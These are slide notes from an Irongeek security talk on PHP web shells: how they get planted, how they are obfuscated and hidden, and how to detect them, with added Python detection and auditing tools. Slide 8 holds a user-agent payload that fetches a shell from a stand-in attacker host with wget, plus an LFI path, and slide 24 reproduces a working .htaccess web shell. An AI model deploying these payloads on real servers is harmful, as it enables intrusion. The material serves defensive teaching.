2.
I run Irongeek.com
I have an interest in InfoSec education
I don't know everything - I'm just a geek with time on my hands
Sr. Information Security Engineer at Diebold, doing managed services and pen-test work
Co-Founder of Derbycon
http://www.derbycon.com
http://Irongeek.com
Twitter: @Irongeek_ADC
3.
Scripts that act as back doors for maintaining access
Common tasks:
File Management
Command line access
Database server access
Bruteforcing
Network Scanning
Pivots
Versions for all sorts of web development environments: PHP, ASP.NET, JSP, etc.
Think of it as a RAT (Remote Access Tool/Trojan) for the web
4.
I wanted to be like Jason Scott…and failed
Attribution is hard
Old security warning from 1994
http://techpubs.sgi.com/library/dynaweb_docs/0620/SGI_Developer/books/NetscapeSrv_PG/sgi_html/ch01.html
Versions of C99 labeled "!C99Shell v. 1.0 beta (21.05.2005)!"
Search for c99shell before 1/01/2005 turns up plenty of shells, but not historical information
Seems to tie to 7/26/1997 (Jul 26, 1997)
filetype:txt PHP daterange:2450654-2450656
5.
My first experiences were at a school where we could put up homepages that used PHP
shell_exec($command) for the win!
Shoveling a Shell using PHP Insecurities
(2/12/2004)
http://www.irongeek.com/i.php?page=security/phpshell
I’ve been pwned by them before
6.
File upload vulnerabilities
Insecure FTP
Command Injection
Remote File Includes/Local File Includes
Exploits on other sites on the same shared host
Other Exploits
SQL Injection
Vulnerable services
7.
1. Client makes a request to a site with an RFI vulnerability
2. Vulnerable web server grabs malicious file off of another server
3. File is included in code executed on the vulnerable web server
4. Attacker then executes commands on the remote vulnerable web server, uploads different shells, grabs files, etc.
8.
Set browser's user agent to:
<?php system('wget http://attackerssite.com/shell.txt -O shell.php');?>
LFI with:
http://somesite.com/index.php?page=../../../../proc/self/environ
More at
http://www.brianhaddock.com/2011/gaining-shellaccess-via-local-file-inclusion-vulnerabilities
10.
Started as a project to show off web vulnerabilities
Like WebGoat, but designed to be easier to use and PHP based
I started it, but Jeremy Druin is in charge of it now and has way more code in it than I do
16.
Ran periodically by a cron job
Reads lines from recent access logs
Greps for likely RFIs, then adds them to old unique RFIs and makes sure they are still unique
Request contains "=http://" (and https)
Requested file ends in .txt|.inc|.dat|.bak
Checks to see if they are still active
Outputs the attacker IP, whois link, URL to webshell, referer, time, etc.
Saves uniques for later
If it does not error out, and the file does not exist, it makes an archive copy
17. Why not let the hosting site know they are serving a shell?
User Agent String:
Hello, I'm not attacking your site, but someone else tried using this file on your server as an RFI against my site. Contact Irongeek at Irongeek.com for more details
http://www.irongeek.com/i.php?page=webshells-and-rfi
18.
Uploaders
General Webshells
Testers/IDers
Search Engine Spammers
Just show the links to search engines based on user agent strings to get higher ranking via back links
Booters
Just emails the attacker that a site is vulnerable, maybe gives a bit of information about the system
Botnets based on webshells
Webservers generally have more bandwidth than workstations
Local rooters
Elevate privileges using local exploits
19.
gzinflate() / gzdeflate()
Meant to allow for compressed data
base64_decode() / base64_encode()
Meant to allow for binary data to be stored as printable ASCII
Others: str_rot13() / rawurlencode() / strrev()
Truncated example:
<? eval(gzinflate(base64_decode('pZL….OyA='))); ?>
Useful decoder:
https://defense.ballastsecurity.net/decoding/
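Added example (not code from the talk): a static unwrapper for the eval(gzinflate(base64_decode('...'))) pattern on this slide. It peels the decoder chain off the string literal without ever executing the result, which is what you want when triaging a suspect file. The sample payload is constructed inside the block (a harmless echo wrapped in gzdeflate, base64 and str_rot13); the decoder table and the parse_chain helper are this example's own, and zlib with a negative window size stands in for PHP's raw-DEFLATE gzinflate().

```python
import base64
import codecs
import re
import urllib.parse
import zlib

# Constructed sample: a harmless PHP snippet wrapped the way the slide describes
# (gzdeflate -> base64 -> str_rot13, then fed to eval()).
PLAINTEXT = "<?php echo 'harmless sample'; ?>"


def php_gzdeflate(data):
    # PHP's gzdeflate() emits a raw DEFLATE stream (no zlib/gzip header), so wbits=-15.
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def build_sample():
    inner = base64.b64encode(php_gzdeflate(PLAINTEXT.encode())).decode()
    rot = codecs.encode(inner, "rot_13")
    return f"<? eval(gzinflate(base64_decode(str_rot13('{rot}')))); ?>"


def _rot13(b):
    return codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1")


# PHP decoder name -> equivalent Python operation on bytes (example's own table).
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP
    "gzuncompress": zlib.decompress,                   # zlib-wrapped variant
    "str_rot13": _rot13,
    "strrev": lambda b: b[::-1],
    "rawurldecode": lambda b: urllib.parse.unquote(b.decode("latin-1")).encode("latin-1"),
    "urldecode": lambda b: urllib.parse.unquote_plus(b.decode("latin-1")).encode("latin-1"),
}


def parse_chain(expr):
    """Split f(g(h('lit'))) into (['f', 'g', 'h'], 'lit'). Only a plain quoted literal is accepted."""
    funcs = []
    rest = expr.strip()
    while True:
        m = re.match(r"(\w+)\s*\(\s*", rest)
        if not m:
            break
        funcs.append(m.group(1).lower())
        rest = rest[m.end():]
    m = re.match(r"(['\"])(.*?)\1\s*(\)*)\s*;?\s*$", rest, re.S)
    if not m or len(m.group(3)) != len(funcs):
        raise ValueError("expression is not a simple nested call on a string literal")
    return funcs, m.group(2)


def deobfuscate(source, max_layers=20):
    """Statically unwrap eval(<decoders>('...')) from PHP source without running it.

    Returns (decoded text, list of decoder layers applied, innermost first)."""
    m = re.search(r"eval\s*\(.*\)\s*;?", source, re.S)
    if not m:
        raise ValueError("no eval() call found")
    funcs, literal = parse_chain(m.group(0))
    if funcs[0] != "eval":
        raise ValueError("outermost call is not eval()")
    layers = list(reversed(funcs[1:]))        # innermost decoder runs first
    if len(layers) > max_layers:
        raise ValueError("too many layers")
    data = literal.encode("latin-1")
    for name in layers:
        if name not in DECODERS:
            raise ValueError(f"unsupported decoder: {name}")
        data = DECODERS[name](data)
    return data.decode("utf-8", errors="replace"), layers


if __name__ == "__main__":
    sample = build_sample()
    text, layers = deobfuscate(sample)
    print("layers:", layers)
    print("decoded:", text)
```

Real samples often nest one eval inside the decoded output; run the decoded text back through deobfuscate() until no eval() remains, keeping max_layers as the stop condition.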
21.
GET is in the URL, POST is in the request headers
POST method less likely to be logged than GET
With a custom client, stealth commands via:
Cookie headers
Non-cookie headers
Multiple levels of obfuscation making it computationally expensive to decode
23.
Available at: https://github.com/epinna/Weevely
Tiny, encrypted, communication over cookies, tons of modules:
Enumerate users and /etc/passwd content
Check php security configurations
Crawl and enumerate web folders files permissions
Find wrong system files permissions
Guess files with wrong permissions in users home folders
Bruteforce all SQL users
Bruteforce SQL username
Collect system information
Send reverse TCP shell
Open a shell on TCP port
Execute system shell command
Execute PHP statement
Mount remote filesystem using HTTPfs
Change file timestamps
Remove remote files and folders
Get SQL database dump
Run SQL console or execute single queries
Install and run Proxy to tunnel traffic through target
Print interfaces addresses
Port scan open TCP ports
Install remote PHP proxy
Find files with write
Find files with superuser flags
24.
Embed it in other scripts' code that is already on the site
Put in an .htaccess file
See Eldar "Wireghoul" Marcussen's work:
https://github.com/wireghoul/htshells
# <!-- Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "--><form method='get'><input type='text' name='c' value='".$_GET['c']."'><input type='submit' name='go' value='Go!'></form>\n<pre>";passthru($_GET['c']." 2>&1");echo "</pre>"; ?>
25.
Attackers don't want others finding their shells and using them
<?php if(preg_match("/bot/", $_SERVER['HTTP_USER_AGENT'])) {header("HTTP/1.0 404"); exit("<h1>Not Found</h1>");}…
26. //Example from Laudanum
$allowedIPs = array("192.168.1.55", "12.2.2.2");
$allowed = 0;
foreach ($allowedIPs as $IP) {
if ($_SERVER["REMOTE_ADDR"] == $IP)
$allowed = 1;
}
if ($allowed == 0) {
header("HTTP/1.0 404 Not Found");
die();
}
27.
How well do they think that will work for them?
<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. …
29.
Ugly, but works:
grep -i "=http://" access.log | grep -iE "\.txt|\.inc|\.dat"
May like my script better
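Added example (not the talk's script): the same two tests the grep on this slide and the cron script on slide 16 apply, done on parsed fields instead of raw text, so the hit carries the attacker IP, the parameter used, the included URL, the status, referer and user agent, and unique shell URLs are tracked across runs. The log lines are constructed in Apache combined format with documentation IP ranges; parse_line, rfi_hits and scan_log are this example's own names.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (combined format); addresses are documentation ranges
# and the requests are invented for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2013:14:02:11 -0500] "GET /index.php?page=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2013:14:03:02 -0500] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2013:14:04:40 -0500] "GET /index.php?page=http://203.0.113.99/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Jan/2013:14:05:13 -0500] "GET /gallery.php?img=https://192.0.2.250/lib/config.inc HTTP/1.1" 404 120 "-" "libwww-perl/5.8"
192.0.2.33 - - [10/Jan/2013:14:05:20 -0500] "GET /?ref=http://example.org/pricing.html HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Same two tests as the slide: the value is an absolute http(s) URL, and the
# included file has one of the extensions shells are usually hosted under.
REMOTE_URL = re.compile(r"^https?://", re.I)
SHELL_EXT = re.compile(r"\.(txt|inc|dat|bak)\??$", re.I)


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_hits(line):
    """Return one record per query parameter in the line that looks like an RFI attempt."""
    rec = parse_line(line)
    if rec is None:
        return []
    query = urlsplit(rec["path"]).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value) and SHELL_EXT.search(value):
            hits.append({
                "ip": rec["ip"], "time": rec["time"], "status": rec["status"],
                "param": name, "url": value.rstrip("?"),   # trailing '?' is the attacker's suffix-eater
                "referer": rec["referer"], "ua": rec["ua"],
            })
    return hits


def scan_log(text, known_urls=None):
    """Scan log text; return (all hits, set of shell URLs not in known_urls)."""
    known = set(known_urls or ())
    hits, new_urls = [], set()
    for line in text.splitlines():
        for hit in rfi_hits(line):
            hits.append(hit)
            if hit["url"] not in known:
                new_urls.add(hit["url"])
    return hits, new_urls


if __name__ == "__main__":
    found, fresh = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} {h["param"]}={h["url"]} status={h["status"]} ua="{h["ua"]}"')
    print("new unique shell URLs:", sorted(fresh))
```

Persist the set returned as new_urls between cron runs (the slide's "saves uniques for later") and pass it back in as known_urls, so each run only reports shells you have not already archived.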
30.
Look for “bad” functions
grep -RPnl "(gzinflate|eval|base64_decode)" /var/www/
No perfect list
Many false positives
31.
AV will mostly miss them
PHP-Shell-Detector
Just signature based to my knowledge
Scans: php/perl/asp/aspx
https://github.com/emposha/PHP-Shell-Detector
NeoPI
Detects on Signatures, Entropy, Longest Word and Index of Coincidence
Scans: php/asp/aspx/sh/bash/zsh/csh/tsch/pl/py/cgi/cfm
https://github.com/Neohapsis/NeoPI
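Added example (not NeoPI or PHP-Shell-Detector code): the signature grep from slide 30 combined with the three statistical tests this slide credits to NeoPI, run over two constructed PHP sources, one ordinary and one wrapped in a base64 blob. The point it shows is why the statistical tests matter: the obfuscated file trips signature, entropy and longest-word tests at once, while a normal template trips none. The threshold constants and the function names are this example's own assumptions, not NeoPI's.

```python
import base64
import hashlib
import math
import re
from collections import Counter

# Same idea as the slide's grep for "bad" functions, with a few more spawn/eval wrappers.
SIGNATURES = re.compile(
    r"\b(eval|assert|gzinflate|gzuncompress|base64_decode|str_rot13|"
    r"passthru|shell_exec|system|exec|popen|proc_open)\s*\(", re.I)

# Constructed samples. BENIGN is ordinary template code; OBFUSCATED wraps a
# pseudo-random blob (stand-in for a compressed payload) the way real shells do.
BENIGN = """<?php
// ordinary template code
$title = 'Contact us';
echo '<h1>' . htmlspecialchars($title) . '</h1><ul>';
foreach ($items as $item) {
    echo '<li>' . htmlspecialchars($item) . '</li>';
}
echo '</ul>';
?>
"""
_blob = base64.b64encode(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(40))).decode()
OBFUSCATED = "<?php eval(gzinflate(base64_decode('" + _blob + "'))); ?>\n"


def shannon_entropy(text):
    """Bits per character; random/compressed/base64 data scores high, source code low."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def longest_word(text):
    """Length of the longest whitespace-delimited token; encoded blobs have no spaces."""
    return max((len(w) for w in text.split()), default=0)


def index_of_coincidence(text):
    """Probability two random letters match; English ~0.066, uniform random ~0.038."""
    letters = [ch for ch in text.lower() if ch.isalpha()]
    n = len(letters)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(letters).values()) / (n * (n - 1))


# Demo thresholds (assumptions for this example, not NeoPI's values).
ENTROPY_LIMIT, WORD_LIMIT, IC_LIMIT = 5.5, 60, 0.04


def score_source(text):
    sigs = sorted({m.group(1).lower() for m in SIGNATURES.finditer(text)})
    ent = shannon_entropy(text)
    lw = longest_word(text)
    ic = index_of_coincidence(text)
    flags = []
    if sigs:
        flags.append("signature")
    if ent > ENTROPY_LIMIT:
        flags.append("entropy")
    if lw > WORD_LIMIT:
        flags.append("longest_word")
    if ic < IC_LIMIT:
        flags.append("index_of_coincidence")
    return {"signatures": sigs, "entropy": round(ent, 3), "longest_word": lw,
            "ic": round(ic, 4), "flags": flags}


def rank_sources(sources):
    """Score a {name: text} mapping and order it most-suspicious first."""
    scored = {name: score_source(text) for name, text in sources.items()}
    return sorted(scored.items(), key=lambda kv: len(kv[1]["flags"]), reverse=True)


if __name__ == "__main__":
    for name, result in rank_sources({"page.php": BENIGN, "cache.php": OBFUSCATED}):
        print(name, result)
```

On a real tree, feed every file under the webroot in and read the top of the ranking rather than trusting the fixed cut-offs; the slide's "many false positives" warning applies to the signature test most of all (minified JS and legitimate libraries also call base64_decode).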
35.
Defaults may be ok, but stuff happens
Test installs like XAMPP may be run as the user
Moving files from one place to another can have unintended consequences
Shared hosting may have your site running under your account, giving scripts permission to your files
Check for writable files?
find /var/www/ -user www-data -perm -u=w -ls
find /var/www/ -perm -2 -ls
Use with caution, just for world-writables:
find /var/www -type d -exec chmod 2775 {} +
find /var/www -type f -exec chmod 0664 {} +
36. Much of the following text copied from
/etc/php5/apache2/php.ini
37.
Allow ASP-style <% %> tags.
asp_tags = Off
http://php.net/asp-tags
PHP Banner in web server header
expose_php = On
http://php.net/expose-php
Whether to allow HTTP file uploads.
file_uploads = On
http://php.net/file-uploads
Display Errors
display_errors = On
http://php.net/display-errors
38.
Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
http://php.net/allow-url-fopen
Whether to allow include/require to open URLs (like http:// or ftp://) as files. (Off by default now.)
allow_url_include = Off
http://php.net/allow-url-include
Disable easily abused functions
disable_functions=system,exec,passthru,shell_exec
http://php.net/manual/en/ini.core.php#ini.disablefunctions
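Added example (not from the talk): a small php.ini auditor that parses the directives shown on slides 37 and 38 and reports which are still at the values that help a web shell, next to a hardened fragment that passes clean. The weak sample below uses exactly the slide values; the hardened one turns the banner, error display and URL wrappers off and adds popen/proc_open to the disabled list. The defaults table is assumed to match PHP 5's built-in defaults, and the "weak"/"review" severities and function names are this example's own.

```python
import re

# Constructed fragment using the values shown on the slides.
SAMPLE_INI = """\
[PHP]
; comment lines and blank lines are ignored
asp_tags = Off
expose_php = On
file_uploads = On
display_errors = On
allow_url_fopen = On
allow_url_include = Off
disable_functions=system,exec,passthru,shell_exec
"""

# The corrected counterpart: same directives, hardened values (example's own choice).
HARDENED_INI = """\
[PHP]
asp_tags = Off
expose_php = Off
file_uploads = Off
display_errors = Off
log_errors = On
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system,exec,passthru,shell_exec,popen,proc_open
"""

# Assumed built-in defaults (PHP 5) used when a directive is absent from the file.
DEFAULTS = {"asp_tags": "Off", "expose_php": "On", "display_errors": "On",
            "allow_url_fopen": "On", "allow_url_include": "Off", "file_uploads": "On"}
TRUE_WORDS = {"1", "on", "yes", "true"}
# Directives that should be off on a production host.
SHOULD_BE_OFF = ["asp_tags", "expose_php", "display_errors", "allow_url_fopen", "allow_url_include"]
# Command-execution wrappers a shell needs: the slide's list plus popen/proc_open.
MUST_DISABLE = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}


def parse_php_ini(text):
    """Minimal key = value parser; ';' starts a comment, [sections] are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"')
    return settings


def is_on(value):
    return value.strip().lower() in TRUE_WORDS


def audit_php_ini(text):
    """Return a list of (directive, severity, message); empty means nothing to fix."""
    s = parse_php_ini(text)
    findings = []
    for key in SHOULD_BE_OFF:
        if is_on(s.get(key, DEFAULTS[key])):
            findings.append((key, "weak", f"{key} is on; set it Off"))
    if is_on(s.get("file_uploads", DEFAULTS["file_uploads"])):
        findings.append(("file_uploads", "review",
                         "uploads enabled; confirm the app needs them and validates them"))
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(MUST_DISABLE - disabled)
    if missing:
        findings.append(("disable_functions", "weak", "not disabled: " + ", ".join(missing)))
    return findings


if __name__ == "__main__":
    for name, ini in (("slide values", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(name, "->", audit_php_ini(ini) or "clean")
```

disable_functions is a PHP_INI_SYSTEM directive, so it only takes effect from the main php.ini or a per-vhost php_admin_value, never from a script or .htaccess; audit the file the server actually loads (the path from phpinfo()), not a copy.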
39.
"DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0"
Many functions modified so UID of the script and the files/directories operated on are the same.
Some functions like shell_exec() disabled
Others like exec() and system() require the executable to be in safe_mode_exec_dir
Way more details here:
http://www.php.net/manual/en/features.safemode.functions.php
40.
Host based WAF
Available at:
http://www.modsecurity.org
modsecurity_crs_45_trojans.conf
Changed my config to:
SecRuleEngine On
SecDefaultAction "phase:4,deny,log,status:500"
Signature based, so same rule applies as AV
41.
Turn off Directory indexing
Add this to .htaccess file or Directory configs:
Options -Indexes
An example of why:
http://www.google.com/?q=intitle:index.of+c99.txt
42.
Shared Hosting MD5 Change Detection Script
http://www.irongeek.com/i.php?page=security/shared-hosting-md5-change-detection-script
Script To Grep For RFI, Webshells, Password Grabs, Web Scanners, Etc.
http://www.irongeek.com/i.php?page=security/logwatch-script-grep-for-rfis-webscanners-webshellattacks
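Added example (not the Irongeek change-detection script): the baseline-and-compare idea behind the MD5 change detection script above, written out so it can run on any webroot. It hashes every regular file under a root, stores the map as JSON, and on the next run reports added, modified and deleted paths, which is how a dropped shell or a backdoored index.php shows up on shared hosting where you cannot see the server logs. SHA-256 is used here instead of MD5 (a choice for this example); demo() builds a throwaway tree in a temp directory, and snapshot/diff_snapshots/save_baseline/load_baseline are this example's own names.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path, algo="sha256"):
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root, algo="sha256"):
    """Map every regular file under root (POSIX-style relative path) to its digest."""
    snap = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full):        # hash what is in the tree, not what links point at
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = file_digest(full, algo)
    return snap


def diff_snapshots(baseline, current):
    """Compare two snapshots and return sorted lists of added/modified/deleted paths."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "modified": modified, "deleted": deleted}


def save_baseline(snap, path):
    with open(path, "w") as f:
        json.dump(snap, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Build a throwaway 'webroot', baseline it, simulate a compromise, report the diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        def write(rel, data):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as f:
                f.write(data)

        # constructed site contents
        write("index.php", "<?php echo 'home'; ?>\n")
        write("lib/config.inc", "<?php $db = 'localhost'; ?>\n")
        write("images/logo.txt", "placeholder\n")
        baseline_file = os.path.join(store, "baseline.json")   # keep this outside the webroot
        save_baseline(snapshot(root), baseline_file)

        # what a compromise looks like on disk: a dropped file, an edited page, a removed file
        write("uploads/avatar.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
        write("index.php", "<?php echo 'home'; /* appended */ ?>\n")
        os.remove(os.path.join(root, "images", "logo.txt"))

        return diff_snapshots(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Store the baseline somewhere the web server account cannot write, and refresh it only after a deploy you made yourself; a baseline that lives in the webroot can be rewritten by the same shell you are trying to catch.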
43.
Writing a stealth web shell and .htaccess shells by Eldar “Wireghoul” Marcussen
http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html
http://www.justanotherhacker.com/projects/htshells/
Effectiveness of Antivirus in Detecting Web Application Backdoors by Rahul "FB1H2S" Sasi
http://www.exploit-db.com/wp-content/themes/exploit/docs/16082.pdf
Detecting Obfuscated Web Shells Talk by Scott Behrens
http://www.youtube.com/watch?v=gRSKuAS71pI
Web Shell Detection Using NeoPI by Scott Behrens and Ben Hagen
http://resources.infosecinstitute.com/web-shell-detection/
Threat: DDoS Booter Shell Scripts
http://www.prolexic.com/pdf/Prolexic_Threat_Advisory_DDoS_Booter_Scripts_052612.pdf
Booting the Booters, Stressing the Stressors - Allison Nixon and Brandon Leven
http://www.irongeek.com/i.php?page=videos/bsidesri2013/2-0-booting-thebooters-stressing-the-stressors-allison-nixon-and-brandon-levene
44. Derbycon
Sept 25th-29th, 2013
Derbycon Art Credits to DigiP
Photo Credits to KC (devauto)
http://www.derbycon.com
Others
http://www.louisvilleinfosec.com
http://skydogcon.com
http://hack3rcon.org
http://outerz0ne.org
http://phreaknic.info
http://notacon.org